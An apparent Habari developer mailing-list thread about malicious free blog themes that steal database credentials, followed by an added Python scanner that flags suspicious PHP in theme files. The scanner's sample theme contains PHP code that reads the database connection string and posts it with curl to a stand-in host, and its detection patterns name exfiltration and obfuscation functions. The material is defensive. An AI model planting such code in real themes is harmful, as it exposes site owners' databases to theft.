This was discussed on the private list after it was forwarded to [email protected]
and the consensus is that this is just something we have to deal with. Themes
containing malware and exploits have become an increasingly popular offering on
sites advertising free blog themes, but as long as you allow any type of
scripting access (whether it be raw PHP or a pseudo-language like Smarty) there
is not much that can be done - the potential for foul play will always exist.
The same level of care and suspicion should apply when downloading a theme or
plugin as when downloading anything else from the internet. Users should be
encouraged to use add-ons from reputable locations like the -extras repository,
where there is at least some additional visibility for contributions, and
always be wary of any third-party sites.
On Feb 4, 2011, at 12:21 AM, Matt-SD wrote:
> Say I build a theme.
>
> Theme.xml contains legitimate stuff, but index.php (and perhaps the
> other files) contain some less-than-good stuff under the hood.
>
> It looks like an acceptable theme when you see the screenshot & when
> you download it, you activate it & look at your theme to marvel in its
> greatness. BUT: somewhere hidden in the theme is this little gem:
>
> <?php
> $str = Config::get('db_connection');
> ** Insert cross-site scripting here **
> ?>
>
> Now your database info has been sent to another site & anybody who
> reads it on that other site can get into your database & mess around
> in it.
>
> --
> To post to this group, send email to [email protected]
> To unsubscribe from this group, send email to
> [email protected]
> For more options, visit this group at
> http://groups.google.com/group/habari-dev
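The thread concludes that scripting access in themes cannot be made safe by design, so the remaining defence is inspection before activation. The following static scanner is an added example, not code from this thread or from the Habari project: it walks a theme package and flags PHP files that read the database connection string (the `Config::get('db_connection')` call quoted above) together with outbound-network or obfuscation primitives. The indicator labels, severity rules and the sample theme are this example's own constructions; the PHP functions it matches (`curl_*`, `fsockopen`, `mail`, `eval`, `base64_decode`, `gzinflate`) are standard PHP.

```python
import re
from pathlib import Path

# Indicator patterns for PHP theme files. Labels are this example's own names.
# Config::get('db_connection') is the Habari call quoted in the thread; the
# remaining functions are standard PHP primitives a theme rarely needs.
CREDENTIAL_READ = ("db_connection_read",
                   re.compile(r"Config::get\(\s*['\"]db_connection['\"]\s*\)"))
OUTBOUND = [
    ("curl", re.compile(r"\bcurl_(?:init|exec|setopt)\s*\(")),
    ("fsockopen", re.compile(r"\bfsockopen\s*\(")),
    ("remote_fetch", re.compile(r"\b(?:file_get_contents|fopen)\s*\(\s*['\"]https?://")),
    ("mail", re.compile(r"\bmail\s*\(")),
]
OBFUSCATION = [
    ("eval", re.compile(r"\beval\s*\(")),
    ("base64_decode", re.compile(r"\bbase64_decode\s*\(")),
    ("gzinflate", re.compile(r"\bgzinflate\s*\(")),
]


def scan_source(filename, source):
    """Scan one file's text; return a finding dict, or None if nothing matched.

    Each indicator is reported once, with the first line on which it appears.
    """
    hits = []  # (label, line number)
    for label, pattern in [CREDENTIAL_READ] + OUTBOUND + OBFUSCATION:
        for lineno, line in enumerate(source.splitlines(), start=1):
            if pattern.search(line):
                hits.append((label, lineno))
                break
    if not hits:
        return None
    labels = {label for label, _ in hits}
    reads_creds = CREDENTIAL_READ[0] in labels
    talks_out = any(label in labels for label, _ in OUTBOUND)
    obfuscated = any(label in labels for label, _ in OBFUSCATION)
    # Severity rule (this example's own): reading the DB connection string and
    # having a way to send it elsewhere is the scenario from the thread.
    if reads_creds and talks_out:
        severity = "high"
    elif reads_creds or obfuscated:
        severity = "medium"
    else:
        severity = "low"  # e.g. mail() alone could be a contact form
    return {"file": filename, "severity": severity, "indicators": hits}


def scan_theme(files):
    """files: mapping of relative path -> file text. Returns a list of findings."""
    findings = []
    for name in sorted(files):
        finding = scan_source(name, files[name])
        if finding is not None:
            findings.append(finding)
    return findings


def scan_directory(root):
    """Load every *.php file under an unpacked theme directory and scan it."""
    root = Path(root)
    files = {str(p.relative_to(root)): p.read_text(errors="replace")
             for p in root.rglob("*.php")}
    return scan_theme(files)


# Constructed sample theme modelled on the scenario in the thread: the
# metadata file looks harmless, index.php reads the DB connection string and
# posts it to a remote host. The XML layout is illustrative, not Habari's schema.
SAMPLE_THEME = {
    "theme.xml": '<?xml version="1.0"?>\n<theme>\n  <name>Shiny</name>\n</theme>\n',
    "index.php": (
        "<?php\n"
        "$str = Config::get('db_connection');\n"
        "$ch = curl_init('http://collector.invalid/');\n"
        "curl_setopt($ch, CURLOPT_POSTFIELDS, $str);\n"
        "curl_exec($ch);\n"
        "?>\n"
        "<html><body><?php echo $theme->header(); ?></body></html>\n"
    ),
    "footer.php": "<?php echo $theme->footer(); ?>\n",
}

if __name__ == "__main__":
    import sys
    results = scan_directory(sys.argv[1]) if len(sys.argv) > 1 else scan_theme(SAMPLE_THEME)
    for f in results:
        print(f"{f['severity'].upper():6} {f['file']}: "
              + ", ".join(f"{label} (line {n})" for label, n in f["indicators"]))
```

Run it against an unpacked theme directory (`python scan_theme.py /path/to/theme`) before activating the theme; with no argument it scans the built-in sample. A clean result is not proof of safety, since an author can split the credential read and the upload across files or build the strings at runtime, but the high-severity pairing above catches the straightforward case described in the thread and gives a reviewer a specific line to look at.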